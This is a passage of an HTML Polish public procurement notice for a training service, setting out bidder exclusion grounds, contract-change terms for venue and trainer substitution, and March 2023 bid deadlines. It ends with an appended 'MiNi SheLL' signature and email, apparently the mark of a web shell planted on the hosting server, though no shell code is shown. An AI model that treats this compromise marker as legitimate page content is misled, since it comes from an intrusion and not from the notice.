przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy Pzp,<br/>2) nie podlegają wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835),<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku do oferty należy załączyć odpowiednie pełnomocnictwo lub w przypadku wspólników spółki<br/>cywilnej, umowę tej spółki, jeśli w niej określono sposób reprezentowania wspólników spółki cywilnej. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym, jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>3. Zamawiający nie przewiduje podstaw wykluczenia, o których mowa w art. 109 ust. 1 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian umowy i warunki ich wprowadzenia określony jest umowie w następujących paragrafach:<br/>§ 7. Zmiana warunków realizacji umowy.<br/>1. Wykonawca zobowiązuje się zrealizować usługę szkolenia w miejscu wskazanym w § 2 ust. 3 umowy, zgodnie z ofertą<br/>Wykonawcy.<br/>2. Zamawiający dopuszcza możliwość zmiany miejsca realizacji usługi, przed rozpoczęciem realizacji usługi, w razie zaistnienia działania tak zwanej siły wyższej, to jest wojny, pożaru, zalania, klęski żywiołowej, strajków a także ograniczenia wprowadzanego przez odpowiednie organy w celu zapewnienia bezpieczeństwa ludności, właściwe dla miejsca i terminu realizacji szkolenia, w tym związanego ze stanem epidemicznym, i tym podobne.<br/>3. Zmiana miejsca realizacji usługi, o którym mowa w ust. 1, będzie możliwa jedynie na pisemny wniosek Wykonawcy, uzasadniony wystąpieniem przyczyn wskazanych w ust. 2 i wymaga pisemnego zaakceptowania przez Zamawiającego.Taka zmiana nie wymaga aneksu.<br/>4. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy wskazane miejsce realizacji usługi będzie spełniać warunki<br/>postawione w tym zakresie w Specyfikacji warunków zamówienia, a standard wskazanego hotelu lub obiektu nie będzie gorszy od standardu hotelu lub obiektu wskazanego pierwotnie w ofercie Wykonawcy i w § 2 ust. 3 umowy, podlegającego ocenie Zamawiającego w ramach kryterium oceny ofert.<br/>5. W przypadku naruszenia przez Wykonawcę postanowień ust. 3 i 4 Zamawiający ma prawo odstąpić od umowy ze skutkiem natychmiastowym bez konieczności wyznaczenia dodatkowego terminu. Zapisy § 11 ust. 1 i 2 mają zastosowanie.<br/>§ 8. Zmiana, zastępstwo, osoby prowadzącej szkolenie.<br/>1. Wykonawca zobowiązuje się wyznaczyć do przeprowadzenia szkolenia jako trenera lub trenerkę szkolenia, osobę wskazaną w ofercie Wykonawcy.<br/>2. Zmiana, rozumiana także jako zastępstwo, osoby, o której mowa w ust. 1, po podpisaniu niniejszej umowy, będzie możliwa jedynie na wniosek Wykonawcy, uzasadniony szczególnymi, obiektywnymi okolicznościami. Zmiana taka musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Taka zmiana nie wymaga aneksu.<br/>3. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy osoba wskazana na zastępstwo będzie posiadała kwalifikacje i doświadczenie spełniające warunki postawione w tym zakresie w Specyfikacji warunków zamówienia, w tym będzie spełniała wymóg realizacji szkoleń w liczbie nie mniejszej niż osoba wskazana w ofercie Wykonawcy do przeprowadzenia szkolenia. Wymóg ten dotyczy wykazu szkoleń ocenianych przez Zamawiającego w kryterium oceny ofert, określonych w z załączniku nr 4 do Specyfikacji warunków zamówienia i dokumentów potwierdzających, że osoba wskazana na zastępstwo wykonała te szkolenia należycie. Trener lub trenerka wskazana na zastępstwo wykonuje szkolenie w zakresie i na warunkach określonych w umowie.<br/>4. W przypadku naruszenia przez Wykonawcę postanowień ust. 2 i 3 Zamawiający ma prawo odstąpić od umowy ze<br/>skutkiem natychmiastowym bez konieczności wyznaczenia dodatkowego terminu. Zapisy § 11 ust. 3 mają zastosowanie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na platformie e-Zamówienia. Link do postępowania: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-1bcb9623-bcdb-11ed-b8d9-2a18c1f2976f. Szczegółowe informacje znajdują się w Rozdziale 10 i 15 SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com